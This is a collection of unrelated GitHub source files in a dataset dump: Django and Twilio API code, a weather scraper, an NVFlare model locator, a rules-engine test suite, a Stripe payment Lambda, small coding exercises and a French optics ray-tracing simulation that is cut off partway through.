cap = TwilioCapability(settings.TWILIO_ACCOUNT_SID,\n settings.TWILIO_AUTH_TOKEN)\n cap.allow_client_outgoing(settings.TWILIO_APPLICATION_SID)\n return cap.generate(expires=60)\n\n\n\nclass ChatCredentialResource(Resource):\n class Meta:\n resource_name = \"chat_credentials\"\n model_class = dict\n methods = [\"POST\"]\n filtering = {\n \"id\": [\"eq\"]\n }\n id = fields.StringField(primary_key=True) \n chat_id = fields.EncodedField()\n token = fields.StringField(readonly=True, nullable=True)\n twilio_capability = fields.StringField(readonly=True, nullable=True)\n\n chat = fields.EncodedForeignKey(ChatResource, backref=\"chat_credentials\")\n\n objects = ChatCredentialManager(db_session_factory)\n authorizer = ChatCredentialAuthorizer(db_session_factory)\n","repo_name":"techresidents/apisvc","sub_path":"apisvc/resources/chat_credential.py","file_name":"chat_credential.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11573959428","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\npage = requests.get(\"http://forecast.weather.gov/MapClick.php?lat=37.7772&lon=-122.4168\")\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\nseven_day = soup.find(id=\"seven-day-forecast\")\r\n\r\nperiod_tags = seven_day.select(\".tombstone-container .period-name\")\r\nperiods = [pt.get_text() for pt in period_tags]\r\n\r\nshort_descs = [sd.get_text() for sd in seven_day.select(\".tombstone-container .short-desc\")]\r\ntemps = [t.get_text() for t in seven_day.select(\".tombstone-container .temp\")]\r\ndescs = [d[\"title\"] for d in seven_day.select(\".tombstone-container img\")]\r\n\r\nweather = pd.DataFrame({\r\n \"period\": periods,\r\n \"short_desc\": short_descs,\r\n \"temp\": temps,\r\n \"desc\":descs\r\n})\r\nprint(weather)\r\n\r\ntemp_nums = weather[\"temp\"].str.extract(r\"(?P\\d+)\", expand=False)\r\nweather[\"temp_num\"] = temp_nums.astype('int')\r\nprint(temp_nums)\r\n\r\nprint(weather[\"temp_num\"].mean())\r\nprint(weather[\"temp_num\"].mean().round())\r\n\r\nwriter = pd.ExcelWriter(\"webscrap.xlsx\", engine='xlsxwriter')\r\nweather.to_excel(writer)\r\nwriter.save()\r\n","repo_name":"zuspitez/WebScraping","sub_path":"web_scraping #3.py","file_name":"web_scraping #3.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10756013732","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '-1'\n\nfrom nvflare.apis.dxo import DXO, DataKind\nfrom nvflare.apis.fl_constant import FLContextKey\nfrom nvflare.apis.fl_context import FLContext\nfrom nvflare.app_common.abstract.model_locator import ModelLocator\n\nfrom tensorflow import keras\nfrom tf2_common.tf2_constants import Constants as TF2Constants\nfrom typing import List\n\nclass TF2ModelLocator(ModelLocator):\n \n def __init__(\n self,\n model_dir = 'models',\n model_name = '%s.h5' % TF2Constants.GLOBAL_MODEL_NAME\n ):\n \"\"\"The ModelLocator's job is to find the models to be included for cross site evaluation\n located on server. This TF2ModelLocator finds and extracts \"server\" model that is saved during training.\n\n Args:\n model_dir (str): Directory to look for models in. Defaults to \"model\"\n model_name (str). Name of the model. Defaults to \"server.h5\"\n \"\"\"\n super().__init__()\n\n self.model_dir = model_dir\n self.model_file_name = model_name\n\n def get_model_names(self, fl_ctx: FLContext) -> List[str]:\n \"\"\"Returns the list of model names that should be included from server in cross site validation.add()\n\n Args:\n fl_ctx (FLContext): FL Context object.\n\n Returns:\n List[str]: List of model names.\n \"\"\"\n return [TF2Constants.GLOBAL_MODEL_NAME]\n\n\n def locate_model(self, model_name, fl_ctx: FLContext) -> DXO:\n self.log_info(fl_ctx, 'locate_model(model_name=%s)' % model_name)\n dxo = None\n engine = fl_ctx.get_engine()\n\n if model_name == TF2Constants.GLOBAL_MODEL_NAME:\n try:\n job_id = fl_ctx.get_prop(FLContextKey.CURRENT_RUN)\n run_dir = engine.get_workspace().get_run_dir(job_id)\n model_path = os.path.join(run_dir, self.model_dir)\n\n model_load_path = os.path.join(model_path, self.model_file_name)\n model = None\n try:\n model = keras.models.load_model(model_load_path)\n self.log_info(fl_ctx, f\"Loaded {model_name} model from {model_load_path}.\")\n except Exception as e:\n self.log_error(fl_ctx, f\"Unable to load Keras Model: {e}.\")\n\n if model is not None:\n weights = {k: v.numpy() for k,v in model.get_weight_paths().items()}\n dxo = DXO(data_kind=DataKind.WEIGHTS, data=weights, meta={})\n except Exception as e:\n self.log_exception(fl_ctx, f\"Exception in retrieving {TF2ModelLocator.SERVER_MODEL_NAME} model: {e}.\")\n\n return dxo","repo_name":"IISAS/nvflare-hysped","sub_path":"volumes/dev/tf/nvflare-sverepec_spolu-sim/app/custom/tf2_model_locator.py","file_name":"tf2_model_locator.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22570832846","text":"from django.shortcuts import render\nfrom django.views.generic.edit import CreateView, UpdateView\nfrom django import forms\nfrom ridesharing.models import Ride\n\n\n# Create your views here.\n\n#this function is called when you access the /ridesharing/ride/add\ndef ride_create(request):\n #create the form you want to add to the html page\n form = RideForm(request.POST or None)\n #make sure form is valid\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n #create a context to pass into the html page\n context = {\n \"form\": form,\n }\n #return the ride_form.html page passing in the context of the form\n return render(request, \"ridesharing/ride_form.html\", context)\n\n\n# used by the the above function for the form for posting a new ride\nclass RideForm(forms.ModelForm):\n class Meta:\n # What model you are trying to create with this form\n model = Ride\n # What fields you want to be able to fill out\n fields = [\"destination\", \"date\"]\n","repo_name":"lbengzon/pigeon","sub_path":"ridesharing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940285675","text":"\"\"\"\n Given a sequence of integer numbers ending with the number 0. Determine the length of the widest fragment where all the elements are equal to each other. \n\nFor example, on input\n5\n3\n4\n4\n5\n5\n6\n4\n4\n4\n0\noutput must be\n3\n\"\"\"\nnum1 = int(input())\nresults = 1\nfinal = 1\n\nwhile True:\n num2 = int(input())\n if num2 == 0:\n break\n if num2 == num1:\n results += 1\n if final <= results:\n final += 1\n else:\n results = 0\n num1 = num2\n \nprint(final)\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POPI challenging problems (optional)/Session 2 Maximal number of consecutive equal elements.py","file_name":"Session 2 Maximal number of consecutive equal elements.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36152524307","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# author:wttree\n# datetime:2018/10/25 13:37\n# software: PyCharm\n# question: 调整数据的顺序使奇数位于偶数前面\n\n'''\n输入一个整数数组,实现一个函数来调整该数组中数字的顺序,\n使得所有的奇数位于数组的前半部分,所有的偶数位于数组的后半部分\n并保证奇数和奇数,偶数和偶数之间的相对位置不变\n'''\n\nclass Solution:\n\n #v1.0无法保证奇数于奇数、偶数于偶数之间的相对位置不变\n def reOrderArray(self, array):\n n = len(array)\n i = 0\n j = n-1\n while i int:\n n = len(grid)\n m = len(grid[0])\n\n used = set()\n\n cache = dict()\n def do(row: int, col: int, k: int) -> int:\n d = cache.get((row, col, k))\n if d:\n return d\n if row == n or col == m or row == -1 or col == -1 or (row, col) in used or (k == 0 and grid[row][col] == 1):\n cache[(row, col, k)] = math.inf\n return math.inf\n if row == n - 1 and col == m - 1:\n return 0\n new_k = k - grid[row][col]\n used.add((row, col))\n res_cur = min([\n do(row - 1, col, new_k),\n do(row + 1, col, new_k),\n do(row, col - 1, new_k),\n do(row, col + 1, new_k)]) + 1\n used.remove((row, col))\n cache[(row, col, k)] = res_cur\n return res_cur\n \n res = do(0, 0, k)\n return res if res < math.inf else -1 \n\n\ntest = Solution()\nprint(test.shortestPath(\n grid=[\n [0, 0, 0],\n [1, 1, 0],\n [0, 0, 0],\n [0, 1, 1],\n [0, 0, 0]\n ],\n k=1))\n\nprint(test.shortestPath(\n grid=[\n [0,1,1],\n [1,1,1],\n [1,0,0]],\n k = 1))\n","repo_name":"dmp2016/LeetCode","sub_path":"Shortest Path in a Grid with Obstacles Elimination.py","file_name":"Shortest Path in a Grid with Obstacles Elimination.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"684161545","text":"# coding=utf-8\nimport asyncio\n\nimport ultros.core.rules.predicates as p\nimport ultros.core.rules.transformers as t\n\nfrom ultros.core.rules.engine import RulesEngine\nfrom ultros.core.rules.constants import TransformerResult\n\nfrom nose.tools import assert_equal, assert_true, assert_raises\nfrom unittest import TestCase\n\n\n__author__ = \"Gareth Coles\"\n\n\nclass TestRules(TestCase):\n def setUp(self):\n self.engine = RulesEngine()\n self.rule_set = \"\"\n self.value = \"\"\n\n self.loop = asyncio.new_event_loop()\n asyncio.set_event_loop(None)\n\n def tearDown(self):\n del self.engine\n del self.loop\n del self.rule_set\n del self.value\n\n async def do_run(self):\n return await self.engine.run(self.rule_set, self.value)\n\n def test_basics(self):\n \"\"\"\n Rules engine basics\n \"\"\"\n\n def predicate_true(*args):\n return True\n\n def predicate_false(*args):\n return False\n\n def predicate_is_true(value, comparable):\n return value is True\n\n def transformer_continue(value):\n return TransformerResult.CONTINUE\n\n def transformer_continue_value(_value):\n def inner(value):\n return TransformerResult.CONTINUE, _value\n return inner\n\n def transformer_return(value):\n return TransformerResult.RETURN\n\n def transformer_return_value(_value):\n def inner(value):\n return TransformerResult.RETURN, _value\n return inner\n\n self.engine.add_rule(\n \"Test1\", predicate_true, \"\", transformer_return_value(\"a\")\n )\n\n self.engine.add_rule(\n \"Test2\", predicate_false, \"\", transformer_continue\n )\n self.engine.add_rule(\n \"Test2\", predicate_true, \"\", transformer_return_value(\"a\")\n )\n\n self.engine.add_rule(\n \"Test3\", predicate_true, \"\", transformer_continue\n )\n self.engine.add_rule(\n \"Test3\", predicate_true, \"\", transformer_return\n )\n\n self.engine.add_rule(\n \"Test4\", predicate_true, \"\", transformer_continue_value(True)\n )\n self.engine.add_rule(\n \"Test4\", predicate_is_true, \"\", transformer_return_value(True)\n )\n\n self.rule_set = \"Test1\"\n self.value = \"\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n \"a\",\n \"Invalid result for Test1; expected \\\"a\\\", got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test2\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n False,\n \"Invalid result for Test2; expected False, got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test3\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n None,\n \"Invalid result for Test3; expected None, got {}\".format(\n repr(result)\n )\n )\n\n self.rule_set = \"Test4\"\n\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(\n result,\n True,\n \"Invalid result for Test4; expected True, got {}\".format(\n repr(result)\n )\n )\n\n def test_predicates(self):\n \"\"\"\n Bundled predicates\n \"\"\"\n\n def transformer_return_value(value):\n def inner(_value):\n return TransformerResult.RETURN, value\n return inner\n\n self.engine.add_rule(\n \"x > y\",\n p.num_greater_than, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x > y\"\n self.value = 10\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x > y\")\n\n self.engine.add_rule(\n \"x < y\",\n p.num_less_than, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x < y\"\n self.value = 0\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x < y\")\n\n self.engine.add_rule(\n \"x contains y\",\n p.str_contains, \"abcd\", transformer_return_value(True)\n )\n\n self.rule_set = \"x contains y\"\n self.value = \"a\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x contains y\")\n\n self.engine.add_rule(\n \"x matches y\",\n p.str_matches_regex, r\"[a]+\", transformer_return_value(True)\n )\n\n self.rule_set = \"x matches y\"\n self.value = \"aaaa\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x matches y\")\n\n self.engine.add_rule(\n \"x not contains y\",\n p.str_not_contains, \"bbbb\", transformer_return_value(True)\n )\n\n self.rule_set = \"x not contains y\"\n self.value = \"a\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x contains y\")\n\n self.engine.add_rule(\n \"x not matches y\",\n p.str_not_matches_regex, r\"[a]+\", transformer_return_value(True)\n )\n\n self.rule_set = \"x not matches y\"\n self.value = \"bbbb\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x matches y\")\n\n self.engine.add_rule(\n \"x == y\",\n p.equal, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x == y\"\n self.value = 5\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x == y\")\n\n identical_object = object()\n non_identical_object = object()\n\n self.engine.add_rule(\n \"x is y\",\n p.identical, identical_object, transformer_return_value(True)\n )\n\n self.rule_set = \"x is y\"\n self.value = identical_object\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x is y\")\n\n self.engine.add_rule(\n \"x != y\",\n p.not_equal, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x != y\"\n self.value = 10\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x != y\")\n\n self.engine.add_rule(\n \"x is not y\",\n p.not_identical, identical_object, transformer_return_value(True)\n )\n\n self.rule_set = \"x is not y\"\n self.value = non_identical_object\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x is not y\")\n\n self.engine.add_rule(\n \"x isinstance y\",\n p.is_instance, str, transformer_return_value(True)\n )\n\n self.rule_set = \"x isinstance y\"\n self.value = \"abcd\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x isinstance y\")\n\n self.engine.add_rule(\n \"x not isinstance y\",\n p.is_not_instance, int, transformer_return_value(True)\n )\n\n self.rule_set = \"x not isinstance y\"\n self.value = \"abcd\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x isinstance y\")\n\n def test_transformers(self):\n \"\"\"\n Bundled transformers\n \"\"\"\n\n def predicate_true(*args):\n return True\n\n def return_true():\n return True\n\n def predicate_is_true(value, comparable):\n return value is True\n\n self.engine.add_rule(\n \"stop\", predicate_true, \"\", t.trans_stop\n )\n\n self.rule_set = \"stop\"\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(result, None, \"Failed: trans_stop\")\n\n self.engine.add_rule(\n \"factory_return\", predicate_true, \"\", t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_return\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_trans_return\")\n\n self.engine.add_rule(\n \"factory_return_call\", predicate_true, \"\",\n t.factory_trans_return_call(return_true)\n )\n\n self.rule_set = \"factory_return_call\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_return_call\")\n\n self.engine.add_rule(\n \"continue\", predicate_true, \"\", t.trans_continue\n )\n self.engine.add_rule(\n \"continue\", predicate_true, \"\", t.factory_trans_return(True)\n )\n\n self.rule_set = \"continue\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: trans_continue\")\n\n self.engine.add_rule(\n \"factory_trans_continue\", predicate_true, \"\",\n t.factory_trans_continue(True)\n )\n self.engine.add_rule(\n \"factory_trans_continue\", predicate_is_true, \"\",\n t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_trans_continue\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_trans_continue\")\n\n self.engine.add_rule(\n \"factory_trans_continue_call\", predicate_true, \"\",\n t.factory_trans_continue_call(lambda *_, **__: True)\n )\n self.engine.add_rule(\n \"factory_trans_continue_call\", predicate_is_true, \"\",\n t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_trans_continue_call\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_trans_continue_call\")\n\n def test_edge_cases(self):\n self.engine.add_rule(\n \"Test1\", p.equal, \"\", t.factory_trans_return(True)\n )\n\n self.engine.del_rule_set(\"Test1\")\n\n self.rule_set = \"Test1\"\n assert_raises(LookupError, self.loop.run_until_complete, self.do_run())\n\n def predicate_true(*args):\n return True\n\n self.engine.add_rule(\n \"Test2\", predicate_true, \"\", lambda *_, **__: \"derp\"\n )\n\n self.rule_set = \"Test2\"\n\n assert_raises(\n NotImplementedError, self.loop.run_until_complete, self.do_run()\n )\n\n async def async_predicate_true(value, comparable):\n return True\n\n async def async_transformer_return_true(value):\n return TransformerResult.RETURN, True\n\n self.engine.add_rule(\n \"Test3\", async_predicate_true, \"\", async_transformer_return_true\n )\n\n self.rule_set = \"Test3\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: Test3\")\n","repo_name":"UltrosBot/Ultros3K","sub_path":"tests/test_rules.py","file_name":"test_rules.py","file_ext":"py","file_size_in_byte":11012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"187127558","text":"from array import *\r\narr = array('i',{}) # this is for the forming a array by given values to by user.\r\nn = int(input(\"enter the length of the array\"))\r\nfor i in range(n): # range goes upto a given n no\r\n x= int(input(\"enter the next value\"))\r\n arr.append(x)\r\nprint(arr) \r\n\r\n\r\nvals = int(input(\"enter the search no: \")) # this for finding the given search index value of a given input no\r\nk=0 # given counter value; this is for generating index value\r\nfor e in arr:\r\n if e==vals:\r\n print(k)\r\n break \r\n k+=1","repo_name":"riddhisharma2019/PYTHON-EXAMPLES","sub_path":"array1.py","file_name":"array1.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20476065109","text":"#import the Python packages for Lambda to use\nimport os\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport stripe\n\nclient = boto3.client('ssm')\n\n#start our Lambda runtime here \ndef handler(event,context):\n \n #Retrieve ANI from inbound callerID\n callerID = event[\"Details\"][\"ContactData\"][\"CustomerEndpoint\"][\"Address\"]\n #Retrieve Ammount\n amountFloat = float(event[\"Details\"][\"Parameters\"][\"Amount\"])\n print(f\"Amount: {amount}\")\n \n dynamoTable = os.environ['AWS_DYNAMODB']\n #Establish connection to dynamoDB and retrieve table\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(dynamoTable)\n \n #KeyConditionExpression looks for number that equals ANI of inbound call from a dynamoDB table and saves it to response\n response = table.get_item(\n Key={'phoneNumber': callerID, 'attrib': 'user'}\n )\n \n customer = stripe.Customer.retrieve(response['Item']['stripeId'])\n\n ssm_response = client.get_parameter(\n Name='StripeApiKey',\n WithDecryption=True\n )\n\n stripe.api_key = ssm_response['Parameter']['Value']\n\n charge = stripe.Charge.create(\n amount=amount,\n currency=\"nzd\",\n customer=customer['id'],\n source=customer['sources']['data'][0]['id'],\n description=f\"Charge for {customer['phone']}\"\n )\n\n status = {'status': charge['status']}\n print(status)\n #Return to Connect our key/value combo \n return status","repo_name":"msimpsonnz/aws-misc","sub_path":"connect-pay/functions/makePaymentExisting/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"32734414025","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.widgets as wdg\n\nclass rayon:\n \"\"\" \n Tracé d'un rayon lumineux et détermination des points de contact\n\n ----------\n x : float\n Abscisse du point d'origine du rayon.\n y : float\n Ordonnée du point d'origine du rayon.\n teta : float\n Angle du rayon par rapport à l'axe des abscisses.\n color : str\n Couleur du rayon.\n direction : bool\n Direction de propagation du rayon (True = vers la droite)\n origine : object\n Origine du rayon (None si provient d'une source)\n \"\"\"\n def __init__(self,figure, x =0, y=0, teta=0, color = \"k\", direction = True, origine = None):\n self.x = x #abscisse d'origine\n self.y =y #ordonnée d'origine\n self.teta = teta #angle du rayon par rapport à l'axe des abscisses\n self.color = color #Couleur du rayon\n self.direction = direction #Direction du rayon\n self.origine = origine #Permet de savoir l'origine du rayon (de quel miroir il provient), utile pour le débogage\n \n self.fig, self.ax = figure #Figure sur laquelle tracer\n \n \n \n if self.direction: #Défini le vecteur x conrrespondant a la direction du rayon\n self.x_array = np.linspace(self.x,self.x+20)\n else:\n self.x_array = np.linspace(self.x, self.x-20)\n \n if origine != None:\n self.color=\"C1\"\n \n \n #On appelle la méthode check() permettant de déterminer si le rayon entre en contact avec un miroir\n self.check()\n \n def trace(self):\n #méthode traçant le rayon\n y = (self.x_array-self.x)*np.tan(self.teta) +self.y #vecteur y\n \n self.ax.plot(self.x_array, y,self.color, alpha = 0.2) #plot\n \n def check(self):\n #Méthode vérifiant si le rayon entre en contact avec un obstacle (dioptre ou miroir)\n def fonction(liste):\n #Fonction prenant en entrée la liste des dioptre de la figure vérifiant si le rayon entre en contact avec un dioptre.\n #Si le rayon va vers la gauche, la liste indiquée sera la liste contenant les dioptre parcourue dans le sens inverse.\n \n for dioptre in liste: #Pour tous les dioptres\n \n #Résolution de l'équation\n A = 1+(np.tan(self.teta)**2)\n B = -2*dioptre.c -2*self.x*(np.tan(self.teta)**2)+2*self.y*np.tan(self.teta)\n C = (dioptre.c)**2 + (self.x**2)*(np.tan(self.teta)**2) - 2*self.y*self.x*np.tan(self.teta) + (self.y**2) - (dioptre.r**2)\n\n delta = (B**2)-(4*A*C)\n if delta < 0:\n continue\n\n #On choisi la bonne solution en fonction de l'interface rencontrée\n if dioptre.side:\n X1 = (-B-np.sqrt(delta))/(2*A)\n else:\n X1 = (-B+np.sqrt(delta))/(2*A)\n Y1 = (X1-self.x)*np.tan(self.teta) +self.y\n\n #Sécurité pour éviter de créer un deuxième rayon réfléchi au point de départ d'un rayon réfléchi\n if round(X1,1) == round(self.x,1):\n continue\n\n #On vérifie si le programme n'as pas choisi la mauvaise solution, et que la solution est bien sur l'interface\n if (Y1 > dioptre.min and Y1 < dioptre.max) and (X1 > np.min(dioptre.xc) and X1 < np.max(dioptre.xc)) and X1 < np.max(self.x_array) and X1 > np.min(self.x_array): \n self.x_array = np.linspace(self.x, X1, 100)\n \n #On calcul l'angle de la normale en fonction de l'interface rencontrée\n if dioptre.side:\n teta_rayon = np.pi - np.arctan(Y1/(dioptre.c-X1))\n else:\n teta_rayon = np.arctan(Y1/(X1 - dioptre.c))\n \n #Calcul de l'angle entre la normale et le rayon incident\n beta = (np.pi - teta_rayon + self.teta)\n \n #Calcul de l'angle entre la normale et le rayon réfracté\n alpha = np.arcsin((np.sin(beta)*dioptre.n_left)/dioptre.n_right)\n \n\n\n\n if (self.direction and dioptre.side) or (not self.direction and not dioptre.side):\n teta_nouveau = teta_rayon + alpha - np.pi\n else:\n teta_nouveau = -alpha + teta_rayon\n\n\n \n #Création d'un rayon réfracté en fonction du point d'impact et de l'angle calculé précédemment\n lst_ray.append(rayon((self.fig,self.ax),X1,Y1, teta_nouveau, origine = dioptre, direction = self.direction))\n \n #Si le rayon se dirige vers la droite, la liste est parcourue dans son sens normal, sinon dans son sens inverse\n if self.direction:\n fonction(lst_dioptre)\n else:\n fonction(lst_dioptre[::-1])\n\n for miroir in lst_miroir: #Pour chaque miroir existant\n #Résolution de l'équation\n A = 1+(np.tan(self.teta)**2)\n B = -2*(miroir.x-miroir.r) -2*self.x*(np.tan(self.teta)**2)+2*self.y*np.tan(self.teta)\n C = (miroir.x-miroir.r)**2 + (self.x**2)*(np.tan(self.teta)**2) - 2*self.y*self.x*np.tan(self.teta) + (self.y**2) - (miroir.r**2)\n\n delta = (B**2)-(4*A*C)\n\n #Si delta négatif, pas de solution, on passe le tour de boucle\n if delta <0:\n continue\n #Si r>0, la solution est sur la droite du \"cercle\", sinon elle est sur la gauche du \"cercle\"\n if miroir.r>0:\n X1 = (-B+np.sqrt(delta))/(2*A)\n else:\n X1 = (-B-np.sqrt(delta))/(2*A)\n Y1 = (X1-self.x)*np.tan(self.teta) +self.y #Calcul de l'ordonnée du point de contact\n\n if round(X1) == round(self.x): #Sécurité pour éviter de créer un deuxième rayon réfléchi au point de départ d'un rayon réfléchi\n continue\n \n #On vérifie si le programme n'as pas choisi la mauvaise solution, et que la solution est bien sur le miroir\n if Y1 < miroir.max and Y1 > miroir.min and (((self.direction == False) and (self.x > miroir.x)) or ((self.direction == True) and (self.x < miroir.x))) and round(X1,1) >= round(np.min(miroir.xc),1) and round(X1,1) <= round(np.max(miroir.xc),1) and ((X1 <= max(self.x_array) and self.direction) or (X1 >= min(self.x_array) and self.direction == False)):\n self.x_array = np.linspace(self.x,X1,100) #On créé le vecteur x entre le point de départ et d'arrivée\n teta_rayon = np.arcsin(Y1/miroir.r) #On calcule l'angle de la normale\n teta_nouveau = -np.pi + 2*teta_rayon -self.teta #On calcule l'angle du rayon réfléchi\n\n \n teta_nouveau = (teta_nouveau + np.pi) % (2 * np.pi) - np.pi #transforme la valeur de l'angle entre -pi/2,pi/2\n if abs(teta_nouveau) > np.pi/2 : #On définit la direction du rayon en fonction de son angle and abs(teta_nouveau) < 3*np.pi/2\n direction = False\n else:\n direction = True\n #On créé un nouveau rayon (réfléchi) en fonction du point de contact avec le miroir, l'angle et sa direction\n lst_ray.append(rayon((self.fig,self.ax),X1,Y1, teta_nouveau, origine = miroir, direction = direction))\n\n\n \n \n self.trace() #On trace le rayon incident\n\nclass source:\n \"\"\" \n Créé un nombre déterminé de rayon lumineux suivant plusieurs conditions\n Permet de créer une source à l'infinie ou non.\n\n ----------\n x : float\n Abscisse du point d'origine des rayons.\n y : float\n Ordonnée du point d'origine des rayon.\n angle : float\n Angle d'ouverture de la source lorsque la source n'est pas à l'infinie.\n N : int\n Nombre de rayons\n inf : bool\n Source à l'infinie ou non.\n height : str\n Hauteur de répartition des rayons lorsque la source est considérée à l'infinie.\n \"\"\"\n def __init__(self,figure, x, y, angle, N, inf = False, height = 0):\n self.figure = figure #Figure sur laquelle tracer\n self.x = x #Position x,y de la source\n self.y = y\n self.alpha = angle #Demie angle d'ouverture de la source\n self.N = N #Nombre de rayon créés par la source\n self.infiny = inf #Source à l'infinie\n self.height = height #Hauteur de création des rayons en mode infini\n\n self.create_ray()\n\n def create_ray(self):\n lst_angle = np.linspace(-self.alpha, self.alpha, self.N) #Liste des angles pour chaque rayon de la source\n\n if self.infiny: #Si la source est à l'infini\n for y in np.linspace(-self.height/2, self.height/2, self.N):\n lst_ray.append(rayon(self.figure, self.x, y, 0)) #Création d'un rayon d'angle 0rad\n else:\n for angle in lst_angle:\n lst_ray.append(rayon(self.figure, self.x, self.y, angle)) #Sinon on trace un rayon avec l'angle correspondant\n\n\n \nclass miroir:\n \"\"\" \n Créé un miroir sphérique concave ou convexe\n\n ----------\n fig : matplotlib figure\n Figure sur laquelle tracer le miroir.\n x : float\n Abscisse du point d'origine des rayons.\n r : float\n Rayon du miroir.\n diametre : float\n Angle d'ouverture du miroir\n color : str\n Couleur du miroir\n \"\"\"\n def __init__(self,fig, x =0, r = 10, diametre = np.pi/3, color =\"k\"):\n self.x = x #position du miroir sur l'axe des abscisses\n self.diametre = diametre #demi-diamètre d'ouverture\n self.r = r #Rayon du miroir\n self.color = color #Couleur du miroir\n self.fig, self.ax = fig #Figure sur laquelle tracer le miroir\n\n self.max = int #Initialisation des variables max et min\n self.min = int\n\n self.test = False\n\n self.trace() #On trace le miroir\n\n def trace(self):\n teta = np.linspace(-self.diametre, self.diametre,1000) #Vecteur teta correspondant à l'angle de chaque point du cercle par rapport à l'axe des x\n \n self.xc = self.r*np.cos(teta) - self.r + self.x #array des x\n self.yc = self.r*np.sin(teta) #array des y\n\n #Calcul de la hauteur max et min du miroir\n self.max = np.max(self.yc)\n self.min = -self.max\n \n self.ax.plot(self.xc, self.yc, color = self.color) #tracé du miroir\n #self.ax.plot(self.x - self.r, 0,marker = \"o\", color = self.color) #Tracé du centre du miroir\n\n\nclass sous_dioptre:\n \"\"\" \n Créé une interface d'une lentille bi-concave ou bi-convexe.\n Voir class dioptre.\n\n ----------\n fig : matplotlib figure\n Figure sur laquelle tracer le dioptre.\n centre : float\n centre du cercle\n r : float\n Rayon du cercle.\n n_left : float\n indice de réfraction à gauche de l'interface\n n_right : float\n indice de réfraction à droite de l'interface\n side : bool\n côté concave de la lentille\n color : str\n Couleur du miroir\n \"\"\"\n def __init__(self, fig, centre, r, teta, n_left, n_right, side, color = \"red\"):\n self.fig, self.ax = fig\n self.color = color #Couleur du dioptre\n\n self.side = side #permet de savoir quel côté du cercle est tracé de manière à choisir la bonne solution de l'équation (true = gauche)\n\n self.r = r #rayon du cercle\n self.c = centre #centre du cercle\n self.teta = teta #array contenant les angles nécessaires au tracé des dioptres\n self.n_left = n_left #indice de réfraction à gauche de la surface\n self.n_right = n_right #indice de réfraction à droite de la surface\n\n self.trace() #Appel de la méthode trace pour tracer la surface\n\n def trace(self):\n self.xc = self.r*np.cos(self.teta)+self.c #array des x\n self.yc = self.r*np.sin(self.teta) #array des y\n\n self.ax.plot(self.xc, self.yc, color = self.color) #tracé\n\n #Calcul de la hauteur max et min du dioptre (utile pour la condition dans la méthode check des rayons)\n self.max = np.max(self.yc)\n self.min = -self.max\n\nclass dioptre:\n \"\"\" \n Créé deux interfaces sous_dioptre par 